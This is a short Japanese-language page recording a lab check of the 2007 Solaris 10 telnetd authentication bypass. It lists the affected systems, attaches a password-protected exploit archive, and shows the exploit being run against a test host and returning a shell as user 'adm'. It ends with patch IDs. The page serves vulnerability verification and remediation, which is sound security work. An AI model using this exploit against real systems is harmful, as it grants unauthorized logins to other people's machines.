目次
Sun Solaris telnet authentication bypass vulnerability
更新履歴
- 2007/02/13 初版
- Author grin
概要
- Solaris telnetデーモンの認証を回避する脆弱性の検証
- この脆弱性を利用すると、ユーザ権限でログイン可能
- 2007/02/10 脆弱性情報公開
影響を受けるシステム
- Sun Solaris 10
添付ファイル
| files | password |
|---|---|
| sunos.zip | pen-test |
参考URL
Exploitの検証
検証環境
- Solaris 10 x86 Platform
検証結果
- ユーザ権限でログイン可能
- 今回の検証ではユーザ「adm」にてログイン
$ ./sunos 192.168.1.10 adm SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net ALEX ALEX Trying 192.168.1.10... Connected to 192.168.1.10. Escape character is '^]'. Last login: Tue Feb 13 21:56:19 from 192.168.1.100 Sun Microsystems Inc. SunOS 5.10 Generic January 2005 $ $ uname -a;id SunOS unknown 5.10 Generic_118855-14 i86pc i386 i86pc uid=4(adm) gid=4(adm) $
対処方法
- 修正パッチの適用を行う
- SPARC Platform
- Solaris 10 IDR125456-01
- x86 Platform
- Solaris 10 IDR125457-01
